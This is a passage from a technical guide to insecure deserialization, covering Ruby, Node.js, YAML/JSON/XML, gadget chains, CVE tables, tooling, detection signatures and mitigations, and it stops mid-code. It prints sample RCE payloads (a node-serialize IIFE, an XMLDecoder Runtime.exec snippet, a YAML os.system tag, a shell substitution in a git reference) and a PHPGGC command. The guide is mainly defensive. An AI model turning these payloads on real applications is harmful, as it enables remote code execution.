| Year | Gadget / Technique | Target |
|---|---|---|
| 2013 | Initial Marshal warning issue | Ruby 2.0 |
| 2016 | Phrack #69 — Rails 3/4 Marshal exploit | Rails ≤ 4.0 |
| 2018 | Luke Jahnke — “Ruby 2.x Universal RCE Deserialization Gadget Chain” (elttam) | Ruby 2.x |
| 2019 | CVE-2019-5420 (Rails 5.2 Marshal) | Rails 5.2 |
| 2019 | Etienne Stalmans — YAML.load universal RCE | Ruby 2.x + Psych |
| 2021 | William Bowling — “Universal Deserialisation Gadget for Ruby 2.x–3.x” | Ruby 2.x/3.x |
| 2022 | William Bowling — “Round Two” updated gadget | Ruby 3.0/3.1 |
| 2024 | Alex Leahu (Include Security) — Rails library-based chains | Rails |
| 2024 | GitHub Security Lab — JSON/XML/YAML/Marshal CodeQL queries + PoCs | Multi-format |
| 2024 | Luke Jahnke — Ruby 3.4 universal RCE + Gem::SafeMarshal escape | Ruby 3.4-rc1 |
The pattern: each patch closes one entry point reachable from Marshal.load or YAML.load, the gadget backend survives, researchers find another entry, repeat. Ruby 3.1 made YAML’s safe_load the default (via Psych 4). Ruby 3.2 patched Marshal gadgets. Ruby 3.4 was released with yet another chain barely averted.
The Gem::SpecFetcher → Runtime chain (2024)#
The current canonical Ruby Marshal universal chain routes through Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::RequestSet, Gem::Resolver::SpecSpecification, Gem::Source::Git, and Gem::Resolver::GitSpecification. The chain ends in shell metacharacter expansion via a git invocation with an attacker-controlled repository name containing shell command substitution:
any.zip → reference field contains `$(id > /tmp/pwn)` → git clone executes it
The gadget lives in RubyGems itself — core Ruby — so the only way to patch it is to change RubyGems internals. Doyensec and Trail of Bits have both found successive variants during RubyGems.org audits.
Where Marshal lurks in real apps#
- Rails cache store with :marshal (the default prior to Rails 7.1)
- Rails session store in legacy configurations
- Background job backends: Resque, Sidekiq (with Marshal coder), DelayedJob
- Cookie-based flash messages in older Rails versions
- DRb (distributed Ruby): entire mechanism is Marshal over sockets
- File-based Ruby object storage: .rb.cache, .marshal, .bin
YAML.load and Psych#
Psych 4 (Ruby 3.1+) made YAML.load == YAML.safe_load by default. YAML.unsafe_load exists for compatibility. Pre-3.1 code calling YAML.load(user_data) is directly exploitable via !ruby/object: tags that instantiate arbitrary classes:
--- !ruby/object:Gem::Installer
i: x
Stalmans’s 2019 chain produces ~3 KB of YAML reaching Runtime.exec-equivalent via ERB template evaluation in a Gem::Installer-chained setter.
JSON.parse(create_additions: true)#
Ruby’s JSON.parse supports an opt-in mode where {"json_class": "SomeClass", ...} triggers SomeClass.json_create({...}). If any class on the load path defines a vulnerable json_create, this is an RCE path. Oj’s “default mode” enables similar behavior by default.
8. Node.js Deserialization#
The node-serialize footgun#
The npm package node-serialize serializes objects including functions — by wrapping functions as "_$$ND_FUNC$$_function () { ... }" strings and evaling them on deserialize. Passing untrusted input to serialize.unserialize() is direct RCE via IIFE:
const serialize = require('node-serialize');

const payload = {
  rce: "_$$ND_FUNC$$_function(){require('child_process').exec('id',function(e,s){console.log(s)});}()"
};
serialize.unserialize(JSON.stringify(payload));
The trailing () in the function string causes immediate invocation. CVE-2017-5941 covered the original disclosure; the package remains on npm with warnings.
funcster, serialize-javascript#
Similar patterns; serialize-javascript is relatively safer when used to produce output for client consumption but dangerous if the output is deserialized via eval on the server with attacker control.
Prototype pollution adjacency#
Node.js deserialization bugs frequently co-occur with prototype pollution (__proto__ key injection via Object.assign, lodash.merge, JSON.parse + merge). A polluted prototype can modify the behavior of deserialization functions used downstream.
YAML in Node.js#
js-yaml’s load() was unsafe by default in versions prior to 4.0 (safeLoad() was the safe variant); 4.0 made load() safe. The yaml package is safe by default. Custom schemas and CORE_SCHEMA with type handlers can reintroduce unsafe behavior.
Main sinks to grep for#
serialize.unserialize(...)
funcster.deepDeserialize(...)
eval(req.body.something)
new Function(req.body.something)
vm.runInNewContext(untrusted)
js-yaml load() (pre-4.0)
node-phantom, PhantomJS IPC
9. YAML & JSON Format Attacks#
YAML is not “just data”#
Modern YAML parsers support typed tags (!!, !, !<...>) that trigger class instantiation in the host language:
| Language | Unsafe Loader | Tag Syntax |
|---|---|---|
| Python (PyYAML <5.1) | yaml.load | !!python/object/apply:os.system ["id"] |
| Java (SnakeYAML <2.0) | Yaml().load | !!javax.script.ScriptEngineManager [...] |
| Ruby (Psych <4.0) | YAML.load | !ruby/object:Gem::Installer |
| .NET (YamlDotNet) | Untyped deserializer | !System.Diagnostics.Process |
| Go (yaml.v2 custom unmarshalers) | Type-dispatched | Typically safe unless reflective |
The maintainer response pattern is often to document the danger rather than change defaults, which is why CVEs in YAML libraries keep landing.
CVE-2022-1471 (SnakeYAML)#
After at least eight prior related CVEs, SnakeYAML was finally given an umbrella CVE for “insecure by default.” SnakeYAML <2.0’s Yaml().load() accepts !! tags that instantiate arbitrary Java classes. A reachable YAML parser in any Spring/Jackson/REST ingestion path becomes RCE without authentication. Fixed in 2.0 by making SafeConstructor the default.
CVE-2026-24009 (Docling RCE via PyYAML)#
A shadow vulnerability: Docling indirectly loaded PyYAML in a path that used yaml.load without an explicit safe loader, regressing when a dependency pin lapsed. The attack surface was document ingestion — upload a crafted document containing a YAML manifest with !!python/object/apply, and Docling parsed it on the server.
JSON deserialization dangers#
Plain JSON isn’t directly vulnerable — JSON grammar has no type tags. But:
- Polymorphic deserializers (Jackson enableDefaultTyping, Json.NET TypeNameHandling, fastjson autoType) add a @class / $type / @type field that reintroduces type-driven instantiation.
- jsonpickle (Python) stores Python objects in JSON and round-trips them through pickle semantics on load.
- Oj (Ruby) in :object mode preserves Ruby class info.
- JSON.parse in Ruby with create_additions: true dispatches to json_create.
Fastjson (Java) is a notable case: com.alibaba.fastjson.JSON.parseObject(str, Object.class) with autoType enabled has had a continuous stream of RCE chains since 2017 (JdbcRowSetImpl JNDI chain being the canonical one).
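The safe alternative to an open-ended type hint is a closed mapping from hint values to known classes. The following sketch shows the idea in Python under stated assumptions: the `@type` field name follows the fastjson convention mentioned above, while `Circle`, `Square`, and `decode_shape` are invented for illustration.

```python
import json


class Circle:
    def __init__(self, radius):
        self.radius = float(radius)


class Square:
    def __init__(self, side):
        self.side = float(side)


# The only types a payload may name; everything else is rejected up front.
ALLOWED_TYPES = {"Circle": Circle, "Square": Square}


def decode_shape(text: str):
    """Decode JSON carrying an @type hint, resolving it via the allowlist only."""
    raw = json.loads(text)
    if not isinstance(raw, dict):
        raise ValueError("expected a JSON object")
    type_name = raw.pop("@type", None)
    cls = ALLOWED_TYPES.get(type_name)
    if cls is None:
        raise ValueError("type {!r} is not allowlisted".format(type_name))
    return cls(**raw)
```

The hint selects among classes the developer chose in advance; it is never passed to an import or class-loading mechanism, so a payload naming a gadget class fails before anything is instantiated.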
XML deserialization#
XMLDecoder (Java) and XML-based formatters in .NET (SoapFormatter, XamlReader.Parse) are equivalent in power to their binary cousins. java.beans.XMLDecoder.readObject parses XML that directly specifies method invocations:
<java>
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <string>calc</string>
    </void>
  </object>
</java>
XStream’s default configuration before 1.4.18 allowed similar arbitrary-class instantiation; dozens of CVEs (CVE-2021-21344 through CVE-2021-39154 and onward) document the gadget chain parade.
10. Gadget Chains Explained#
The chain-of-method-dispatch abstraction#
A gadget chain is a sequence of class method invocations connected by field references, where:
- Entry gadget: a class whose readObject, __wakeup, __destruct, __reduce__, etc. is called automatically during deserialization and does something more than set fields.
- Relay gadgets: classes whose methods (called by the previous gadget) make further method calls on attacker-controlled fields, propagating control flow.
- Sink gadget: a terminal class whose invoked method reaches a native “do something dangerous” primitive (exec, eval, system, file write, reflection invoke, HTTP request, deserialize-again).
The attacker picks an object type for each field so that the “dynamic dispatch” at each link points to the next gadget. The chain is then serialized and submitted to the sink.
Why chains exist (the Russian doll metaphor)#
No sane developer writes readObject to call Runtime.exec directly. But developers write readObject methods that call this.field.someMethod(), where someMethod is an interface method. The JVM / PHP / Python runtime resolves someMethod at dispatch time based on the actual class of this.field. Swap this.field for a LazyMap or an InvokerTransformer and you’ve changed the target of the call without changing the call site.
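The entry / relay / sink structure can be illustrated with a deliberately harmless toy in Python. All three classes and SINK_LOG are hypothetical names invented for this sketch; the sink only appends to a list where a real chain would reach exec or system.

```python
import pickle

SINK_LOG = []  # harmless stand-in for exec/system


class Recorder:
    """Sink gadget: its method reaches the 'dangerous' primitive."""
    def handle(self, arg):
        SINK_LOG.append(arg)


class Forwarder:
    """Relay gadget: forwards a call to whatever object sits in a field."""
    def __init__(self, target, arg):
        self.target = target
        self.arg = arg

    def refresh(self):
        self.target.handle(self.arg)


class Cache:
    """Entry gadget: __setstate__ runs automatically during unpickling."""
    def __init__(self, loader=None):
        self.loader = loader

    def __setstate__(self, state):
        self.__dict__.update(state)
        if self.loader is not None:
            self.loader.refresh()  # innocent-looking call on a field


# The "attacker" only chooses which objects sit in which fields.
chain = Cache(loader=Forwarder(Recorder(), "attacker-chosen argument"))
blob = pickle.dumps(chain)

pickle.loads(blob)  # the victim calls no method explicitly
print(SINK_LOG)     # ['attacker-chosen argument']
```

None of the three classes is a bug on its own. The sink fires because Cache.__setstate__ dispatches on a field whose concrete type was chosen by whoever produced the bytes.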
Gadget hunting methodology#
- Seed set: find all classes implementing the deserializable marker (java.io.Serializable, PHP __wakeup / __destruct, Python __reduce__, .NET [Serializable]).
- Entry set: filter to classes whose deserialization-time methods do more than field assignment: a call to any method on a field, any reflection API, any eval-equivalent.
- Graph expansion: for each entry, model “what methods does this call on fields I control?” Traverse the call graph backward from known sinks (Runtime.exec, eval, system, include).
- Constraint solving: each edge has type requirements (the field must be assignable to an interface that has the called method); solve for a feasible object graph.
- Serializability filter: every node in the graph must itself be deserializable by the target format.
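The steps above can be sketched as a search over a call graph. The graph below is a hand-written, heavily simplified assumption (real tools derive it from bytecode and also solve type constraints), Helper is a made-up non-serializable class, and for brevity the search runs forward from entry points rather than backward from sinks.

```python
from collections import deque

# Hypothetical call graph: "Class.method" -> methods it may invoke on
# attacker-controllable fields.
CALL_GRAPH = {
    "PriorityQueue.readObject": ["TransformingComparator.compare", "Helper.compare"],
    "TransformingComparator.compare": ["InvokerTransformer.transform"],
    "InvokerTransformer.transform": ["Method.invoke"],
    "Helper.compare": ["Method.invoke"],
    "HashMap.readObject": ["URL.hashCode"],
    "URL.hashCode": ["InetAddress.getByName"],
}
# Seed set: classes the target format is able to reconstruct.
SERIALIZABLE = {"PriorityQueue", "TransformingComparator",
                "InvokerTransformer", "HashMap", "URL"}
SINKS = {"Method.invoke", "InetAddress.getByName"}


def owner(method):
    return method.split(".")[0]


def find_chains(graph, serializable, sinks):
    """Breadth-first search from every readObject entry to any sink."""
    chains = []
    entries = [m for m in graph
               if m.endswith(".readObject") and owner(m) in serializable]
    for entry in entries:
        queue = deque([[entry]])
        while queue:
            path = queue.popleft()
            for callee in graph.get(path[-1], []):
                if callee in path:
                    continue  # avoid cycles
                if callee in sinks:
                    chains.append(path + [callee])
                elif owner(callee) in serializable:
                    queue.append(path + [callee])
                # else: serializability filter prunes this edge
    return chains


for chain in find_chains(CALL_GRAPH, SERIALIZABLE, SINKS):
    print(" -> ".join(chain))
```

The path through Helper.compare is dropped even though it reaches a sink, because Helper cannot appear in the serialized object graph.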
Automated gadget discovery tools#
| Tool | Language | Approach |
|---|---|---|
| Gadget Inspector | Java | Bytecode analysis; finds call-graph paths from readObject to sinks |
| JOOGIE | Java | Static data-flow analysis |
| SerHyBrid | Java | Hybrid static/dynamic exploration |
| PHPGGC | PHP | Curated chain database with generator CLI |
| Fickling | Python | Pickle bytecode parser, static analyzer, and gadget constructor |
| PickleBall | Python | Per-library policy generator, not discovery |
| Freddy (Burp) | Multi | Deserialization payload injector with ~30 known chains |
| ysoserial / ysoserial.net | Java / .NET | Payload generator for ~30 known Java chains, ~15 .NET |
| marshalsec | Java | Non-JDK serialization formats (Jackson, XStream, Kryo, Hessian, JYaml, Red5) |
| GadgetProbe | Java | DNS-based blind probing to fingerprint classpath classes |
The “unpatchable” property#
A gadget chain is a path through the classpath. Patching one class on the path closes that specific path but leaves every other path open. The set of gadgets on a modern enterprise Java classpath is combinatorially enormous — any library that does reflection, method dispatch on attacker-controlled fields, or custom deserialization logic is a potential source of gadgets. This is why the only durable fix is to not deserialize untrusted data in native formats.
11. Real-World CVEs & Exploitation Chains#
Java#
| CVE | Product | Chain / Trigger |
|---|---|---|
| CVE-2015-4852 | WebLogic T3 | CommonsCollections over T3 |
| CVE-2015-7501 | JBoss/Jenkins | CommonsCollections via /invoker/JMXInvokerServlet |
| CVE-2016-1000031 | Apache Commons FileUpload | DiskFileItem reflective file write |
| CVE-2017-5638 | Struts2 (S2-045) | OGNL via Content-Type (not pure deser, related family) |
| CVE-2017-10271 | WebLogic | XMLDecoder on WLS-wsat /wls-wsat/CoordinatorPortType |
| CVE-2018-7489 | Jackson-databind | c3p0 gadget via default typing |
| CVE-2019-2725 | WebLogic | XMLDecoder unauthenticated RCE |
| CVE-2019-17571 | Log4j 1.x SocketServer | ObjectInputStream on log socket |
| CVE-2021-44228 | Log4Shell | JNDI lookup (adjacent but not pure deser) |
| CVE-2022-1471 | SnakeYAML | !!ScriptEngineManager with URLClassLoader |
| CVE-2022-22963 | Spring Cloud Function | SpEL via spring.cloud.function.routing-expression |
| CVE-2022-22965 | Spring4Shell | Class.module.classLoader binding exposure |
| CVE-2022-33980 | Apache Commons Configuration | Script interpolator |
| CVE-2023-22518 | Confluence | Improper authorization on setup/restore endpoints (adjacent, not pure deser) |
| CVE-2024-36991 | Splunk Enterprise (Windows) | Path traversal (adjacent, not pure deser) |
| CVE-2026-33728 | dd-trace-java RMI instrumentation | Unsafe deserialization in RMI instrumentation may lead to RCE |
| CVE-2026-33439 | OpenAM | Pre-auth RCE via Java deserialization |
PHP#
| CVE | Product | Chain |
|---|---|---|
| CVE-2015-8562 | Joomla | User-Agent injection → session deser → POP chain |
| CVE-2016-9920 | PhpMyAdmin | __destruct file write |
| CVE-2017-12794 | Symfony | Property injection via session cookie |
| CVE-2018-17057 | Yii 2 | __destruct via BatchAction |
| CVE-2019-6340 | Drupal 8 | REST _type POP chain |
| CVE-2019-11043 | PHP-FPM | Adjacent (not pure deser) |
| CVE-2020-28949 | Archive_Tar | Phar deser via tar extract |
| CVE-2021-41773 | Apache HTTP Server 2.4.49 | Path traversal (adjacent, not PHP deser) |
| CVE-2023-1671 | Sophos Web Appliance | PHP deser RCE |
| CVE-2024-4577 | PHP CGI | Adjacent argument injection |
| CVE-2026-3422 | U-Office Force | Critical RCE via insecure deserialization |
Python#
| CVE | Product | Pattern |
|---|---|---|
| CVE-2017-7610 | Ansible Tower | YAML deser |
| CVE-2019-20477 | PyYAML | FullLoader bypass |
| CVE-2020-14343 | PyYAML | Bypass of earlier fix |
| CVE-2022-0330 | graphql-python | pickle session |
| CVE-2023-27586 | torch.load | Pre-weights_only default |
| CVE-2025-32444 | vLLM Mooncake | ZeroMQ recv_pyobj() on 0.0.0.0 (CVSS 10.0) |
| CVE-2025-24357 | vLLM | Torch checkpoint untrusted load |
| CVE-2026-24009 | Docling | PyYAML regression via unpinned dep |
| CVE-2026-25769 | Wazuh | Critical RCE via unsafe deserialization |
| CVE-2026-26220 | LightLLM | WebSocket pickle with broken nonce auth |
| CVE (picklescan) | picklescan | 4 separate bypass CVEs in 2025 (Sonatype) |
| CVE (picklescan) | picklescan | 3 zero-days disclosed by JFrog |
| — | IBM Langflow Desktop (Langflow) | RCE via insecure deserialization |
.NET#
| CVE | Product | Pattern |
|---|---|---|
| CVE-2017-9424 | SharePoint | XmlSerializer with untyped payload |
| CVE-2019-0604 | SharePoint | XmlSerializer via ItemMetadata |
| CVE-2020-0688 | Exchange | ViewState forgery with static machine key |
| CVE-2020-0932 | SharePoint | BinaryFormatter |
| CVE-2020-25258 | Hyland OnBase | BinaryFormatter |
| CVE-2021-27076 | SharePoint | Replay-style ObjectStateFormatter |
| CVE-2021-29508 | Wire (Proto.Actor) | BinaryFormatter-backed IPC |
| CVE-2022-21969 | Exchange | BinaryFormatter in MAPI |
| CVE-2023-3513 | Razer Central | BinaryFormatter named pipe |
| CVE-2023-5914 | CentralSquare | BinaryFormatter |
| CVE-2024-29847 | Ivanti EPM | Agent Portal deserialization |
| CVE-2024-38094 | SharePoint | XML deserialization |
| CVE-2025-53770 | SharePoint ToolShell | ViewState deser chain, actively exploited |
| CVE-2026-20963 | SharePoint | Deserialization RCE |
| CVE-2026-26114 | SharePoint | Deserialization RCE |
| — | SolarWinds Web Help Desk | Java (not .NET) deserialization enabling command execution |
Ruby#
| CVE | Product | Pattern |
|---|---|---|
| CVE-2013-0156 | Rails | YAML in XML params |
| CVE-2019-5420 | Rails 5.2 | Guessable development-mode secret key → forged signed Marshal payload |
| CVE-2020-8163 | Rails | Local variables in partials |
| CVE-2022-32224 | Rails (Active Record) | YAML.unsafe_load on serialized columns |
| — | RubyGems.org | Multiple informational-severity Marshal issues (ToB audit) |
Notable exploitation chains#
SharePoint ToolShell (CVE-2025-53770, July 2025). Unauthenticated attackers POST a crafted request to /_layouts/15/ToolPane.aspx with a __VIEWSTATE carrying a deserialization payload (TextFormattingRunProperties → XAML → Process.Start). The webshell then parses additional VIEWSTATE-encoded commands. Check Point Research observed 4,600+ compromise attempts across 300+ organizations in one week; the same IPs chained Ivanti EPMM CVE-2025-4427/4428 for lateral movement. Mitigation required rotating ASP.NET machine keys in addition to patching.
WebLogic Christmas (CVE-2015-4852 → CVE-2017-10271 → CVE-2019-2725 → …). A continuous stream of deserialization RCEs against Oracle WebLogic over a 5+ year window. Each patch closed one reachable deserializer endpoint; the next CVE found another (T3 → IIOP → XMLDecoder in wls-wsat → async SOAP → …). Illustrates the “cannot patch your way out” property at enterprise scale.
Jenkins Jenkinspocalypse (CVE-2015-8103, CVE-2016-0792, CVE-2016-9299). Unauthenticated Jenkins instances exposed a CLI port that accepted serialized Java objects. CommonsCollections gadget was directly applicable. Thousands of public Jenkins instances fell in the ensuing mass-exploitation wave.
Equifax (CVE-2017-5638, Struts2). Not pure deserialization — OGNL injection via Content-Type — but illustrates the same root cause: attacker-controlled data reaches a VM that interprets it as code. Directly led to the exposure of 147 million records.
Log4Shell adjacency (CVE-2021-44228). JNDI lookups embedded in log strings fetch remote Reference objects; upon resolution, the javaSerializedData field is deserialized via the classic JDK path, re-entering the deserialization attack family through a logging front door.
12. Tools & Automation#
Offensive tooling (used defensively for payload generation, detection, and validation)#
| Tool | Language | Purpose |
|---|---|---|
| ysoserial | Java | Canonical Java deserialization payload generator (~30 chains) |
| ysoserial.net | .NET | Equivalent for .NET with ~15 gadget families including XAML chains |
| marshalsec | Java | Non-JDK formats: Jackson, XStream, Kryo, Hessian, JYaml, Red5, JSON-IO |
| PHPGGC | PHP | Curated PHP POP chain database and payload generator |
| Fickling | Python | Pickle decompiler, static analyzer, payload constructor |
| ModelScan | Python | ML model file scanner (ProtectAI) |
| picklescan | Python | HuggingFace’s blocklist scanner (known bypasses exist) |
| GadgetProbe | Java | DNS-based blind classpath fingerprinting |
| Freddy | Burp plugin | Injects deserialization payloads across formats |
| SerialKiller | Java | Runtime allowlist enforcement (wrap around ObjectInputStream) |
| not-so-serial | Java | Runtime blocklist enforcement |
| ConstructionInspector | Java | Build-time gadget detection via classpath analysis |
| Semgrep rules | Multi | TrailOfBits published rules for Ruby (marshal-load-method, rails-cache-store-marshal, yaml-unsafe-load, json-create-deserialization) |
| CodeQL queries | Multi | GitHub Security Lab publishes unsafe-deserialization queries for Java, Ruby, Python, C# |
ysoserial usage (defensive validation)#
Security teams use ysoserial to validate that patches, allowlists, and WAF rules actually block known payloads. The tool takes a chain name and a command and emits serialized bytes suitable for piping into a test harness that stands in for your application’s deserialization sink. Each chain depends on specific libraries being present on the target classpath, so the chain you pick determines which prerequisites must hold for the payload to succeed.
marshalsec#
Moritz Bechler’s marshalsec covers the non-JDK format space (Jackson, XStream, Kryo, Hessian, JYaml, etc.). It is the reference for understanding that “Java deserialization” is not just ObjectInputStream — every polymorphic serializer in the ecosystem has the same category of bug.
PHPGGC#
./phpggc Monolog/RCE1 system id produces a serialized payload for the Monolog RCE1 chain. Chains are namespaced by target library: Laravel/RCE1..n, Drupal/RCE1..n, Symfony/RCE1..n, Wordpress/RCE1..n, PrestaShop/RCE1..n, Yii/RCE1..n, and many more. Use -l <keyword> to list chains, -u to URL-encode, -b to base64-encode, and --phar to produce a PHAR file (for the phar:// trick).
Fickling#
Trail of Bits’s Fickling disassembles pickle bytecode (a static analysis step no generic analyzer performs by default). It can detect known-malicious patterns, decompile pickle opcodes to pseudo-Python, and construct payloads to test defenses. Critically, it demonstrates how trivially pickle exploitation generalizes — any callable reachable from Python’s import system is a gadget.
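As a rough illustration of what “disassembling pickle bytecode” means, the sketch below uses the standard library's pickletools as a stand-in; it is not Fickling's API. The Probe class and imported_globals function are names invented here, and the STACK_GLOBAL handling is a heuristic that assumes the module and attribute names are the two most recently pushed strings, which a hand-crafted payload can violate.

```python
import os
import pickle
import pickletools


class Probe:
    def __reduce__(self):
        # Nothing runs at dump time; the returned callable would run on load.
        return (os.system, ("id",))


def imported_globals(blob):
    """List (module, name) pairs a pickle would import, without loading it."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            if len(strings) >= 2:  # heuristic: last two pushed strings
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


blob = pickle.dumps(Probe(), protocol=4)  # serialized only, never loaded
print(imported_globals(blob))
```

On Linux this reports the posix module's system function (nt on Windows) without ever calling pickle.loads, which is the property that makes static inspection safe to run on untrusted files.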
Build-time detection#
- Dependency scanning: identify commons-collections, commons-beanutils, spring-core, jackson-databind, xstream, groovy, hibernate, c3p0, rome, snakeyaml versions against known-vulnerable ranges.
- Classpath hygiene: remove unused libraries. A gadget in an unused library is still a gadget.
- SBOM generation: CycloneDX/SPDX inventories plus vulnerability databases (OSS Index, GHSA) will catch most known-bad versions.
Runtime detection#
- Java: ObjectInputFilter (JEP 290; JDK 9+, backported to 8u121, 7u131, and 6u141) allows allowlisting or blocklisting classes during readObject. The backports make it usable for legacy code that cannot be rewritten.
- .NET: a SerializationBinder assigned to the Binder property on BinaryFormatter allows restricting types; however, Microsoft’s own guidance states this is insufficient and BinaryFormatter should be retired entirely.
- Ruby: Marshal.load has no type filter. Wrap in a custom class-checking loader or migrate.
- Python: subclassing pickle.Unpickler and overriding find_class to allowlist is the documented approach. It works but is fragile; see picklescan bypass research.
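The Python item above can be sketched with the standard library alone. ALLOWED, AllowlistUnpickler, and safe_loads are names chosen for this example, and the allowlist contents are an assumption that a real application would replace with the handful of types it actually expects.

```python
import io
import pickle

# Assumed allowlist: only these globals may be resolved during loading.
ALLOWED = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the stream asks to import.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(blob):
    return AllowlistUnpickler(io.BytesIO(blob)).load()


# Plain containers need no global lookup, so they load without an entry.
print(safe_loads(pickle.dumps({"user": "ada", "roles": ["admin"]})))
```

A stream that references anything outside ALLOWED, such as the os.system payload shown later in this guide, fails in find_class before the callable is ever invoked. The fragility lies in the allowlist itself: every permitted class becomes part of the attack surface.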
13. Detection & Static Analysis#
Taint source → sink patterns#
| Language | Source | Sink |
|---|---|---|
| Java | HttpServletRequest.getInputStream() | new ObjectInputStream(...).readObject() |
| Java | request.getParameter(...) → Base64.decode | readObject, XMLDecoder.readObject |
| PHP | $_GET, $_POST, $_COOKIE, file_get_contents("php://input") | unserialize, yaml_parse |
| PHP | Any user-controlled path | file_exists("phar://$path"), filesize, is_dir |
| Python | request.data, websocket.receive_bytes, socket.recv | pickle.loads, joblib.load, torch.load |
| Python | File path from DB / config / upload | yaml.load, yaml.unsafe_load |
| .NET | Request.Form, Request.InputStream, Request["__VIEWSTATE"] | BinaryFormatter.Deserialize, ObjectStateFormatter.Deserialize |
| .NET | JsonConvert.DeserializeObject with TypeNameHandling != None | The call itself |
| Ruby | params[:data], cookies[:session] | Marshal.load, YAML.load (unsafe), Oj.load default |
| Node.js | req.body, req.query | serialize.unserialize, eval, vm.runInNewContext |
CodeQL query shape#
GitHub Security Lab’s unsafe deserialization queries model:
- A set of known-dangerous deserialization calls as sinks.
- A standard HTTP-input taint source set.
- An intermediate “encoding” sanitizer set that does not actually sanitize but is often wrongly assumed to (Base64, URL-decode, JSON.parse).
- Path constraints requiring the sink to be reachable from the source without passing through type-safe deserializers.
Semgrep / grep signatures#
# Java
pattern: new ObjectInputStream($X).readObject()
pattern: new XMLDecoder(...).readObject()
pattern: new Yaml().load($X) # SnakeYAML
pattern: $MAPPER.enableDefaultTyping()
pattern: new XStream().fromXML($X) # without setupDefaultSecurity
pattern: Kryo.readClassAndObject(...)
# PHP
pattern: unserialize($_...)
pattern: unserialize($$X) where $$X from $_GET/$_POST/$_COOKIE
pattern: yaml_parse($X)
pattern: file operation on user-controlled "phar://..."
# Python
pattern: pickle.loads(...)
pattern: pickle.load(...)
pattern: joblib.load(...)
pattern: torch.load(...) # without weights_only=True
pattern: numpy.load(..., allow_pickle=True)
pattern: yaml.load($X) # without SafeLoader
pattern: yaml.unsafe_load(...)
pattern: recv_pyobj()
# .NET
pattern: new BinaryFormatter().Deserialize(...)
pattern: new SoapFormatter().Deserialize(...)
pattern: new NetDataContractSerializer().ReadObject(...)
pattern: new ObjectStateFormatter().Deserialize(...)
pattern: new LosFormatter().Deserialize(...)
pattern: JsonConvert.DeserializeObject<$T>(..., settings with TypeNameHandling.All|Objects|Arrays|Auto)
pattern: new JavaScriptSerializer(new SimpleTypeResolver())
# Ruby
pattern: Marshal.load(...)
pattern: YAML.load(...) # if pre-Psych 4
pattern: YAML.unsafe_load(...)
pattern: Oj.load(...) # default mode
pattern: JSON.parse(..., create_additions: true)
pattern: Rails.cache with :marshal coder
# Node.js
pattern: serialize.unserialize(...)
pattern: eval(<user data>)
pattern: new Function(<user data>)
pattern: vm.runInNewContext(<user data>)
Runtime telemetry signals#
- Java ClassNotFoundException bursts during deserialization: attacker probing which gadget classes exist.
- Outbound DNS lookups correlated with request handlers: URLDNS probe pattern.
- JRMP/LDAP outbound from app servers: JNDI gadget signal.
- Process spawn by application JVM/CLR/PHP/Python workers: deserialization RCE footprint.
- Unusual child processes under w3wp.exe: ViewState RCE.
- Memory/CPU spikes with deep object graphs: DoS attempts.
- readObject stack frames in production stack traces: inventory for review.
Log-based detection#
Log deserialization exceptions. Many real exploits throw exceptions partway through the chain (e.g., cast failures after the side-effect-bearing gadget fires). A spike of ClassCastException, InvalidClassException, java.io.StreamCorruptedException, _pickle.UnpicklingError, TypeError: __reduce__ is a signal.
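A spike check of this kind might look like the following sketch. It assumes each log line begins with an ISO-8601 timestamp such as 2025-07-20T10:15:32, which is an assumption about your log format, and the threshold of five per minute is an arbitrary placeholder to tune against your own baseline.

```python
import re
from collections import Counter

# Exception names taken from the paragraph above.
SIGNALS = re.compile(
    r"ClassCastException|InvalidClassException|"
    r"StreamCorruptedException|UnpicklingError"
)


def deser_error_spikes(lines, threshold=5):
    """Return {minute: count} for minutes with >= threshold matching lines."""
    per_minute = Counter()
    for line in lines:
        if SIGNALS.search(line):
            per_minute[line[:16]] += 1  # "YYYY-MM-DDTHH:MM"
    return {minute: n for minute, n in per_minute.items() if n >= threshold}
```

Bucketing by minute keeps the sketch short; a production rule would more likely live in the SIEM and compare against a rolling baseline per service.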
14. Prevention & Mitigation#
The hierarchy of fixes (strongest first)#
1. Don’t deserialize untrusted data at all. This is the only truly safe position. Use a format that cannot encode arbitrary classes: JSON (without @class / $type / polymorphic typing), Protocol Buffers, MessagePack, CBOR, FlatBuffers, Cap’n Proto. Parse these into fixed, known data types — never “generic object.”
2. If you must use a native format, use integrity protection. Sign the serialized blob with an HMAC using a server-held key. Verify the signature before invoking any deserialization. This does not make deserialization safe; it merely ensures the bytes came from your own code. Rails’ ActiveSupport::MessageVerifier, Rails signed cookies, and JWT (with proper algorithm binding) are examples. Caveat: key leaks (ASP.NET machine key, Rails secret_key_base) turn this from a hard problem into a trivial one, as ViewState exploits repeatedly demonstrate.
3. Apply type allowlists at the deserializer.
- Java: ObjectInputFilter.Config.setSerialFilter(...) globally, or per-stream via ois.setObjectInputFilter(...) on the ObjectInputStream (JEP 290). Allowlist expected classes only.
- .NET: abandon BinaryFormatter. If unavoidable, a SerializationBinder restricting types is the documented mitigation, but Microsoft explicitly says this cannot be made secure.
- Python: subclass pickle.Unpickler, override find_class(module, name) to raise on anything not in a tight allowlist. Better: use the PickleBall approach of per-library generated policies.
- Ruby: wrap Marshal.load; no built-in filter exists. Trail of Bits recommends adding Marshal.safe_load upstream.
- PHP: unserialize($data, ['allowed_classes' => ['ExpectedClass']]) (PHP 7.0+) restricts instantiation but does not prevent __wakeup / __destruct on allowed classes from being abused.
4. Isolate the deserializer. Run the code that does deserialization in a separate process, container, or sandbox with:
- No network egress to metadata services or internal endpoints
- Read-only filesystem where possible
- Minimal privileges (non-root, no cloud credentials via IMDS)
- Resource limits to bound DoS blast radius
5. Defense in depth. Logging, anomaly detection, WAF rules for serialized magic bytes (rO0, AAEAAAD, O: at start of body), egress filtering of JRMP/LDAP/unusual DNS patterns.
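Item 2 in the hierarchy above (verify integrity before deserializing) can be sketched with Python's hmac module. The seal and open_sealed names and the tag-then-payload layout are choices made for this example rather than any framework's wire format, and key management is out of scope.

```python
import hashlib
import hmac
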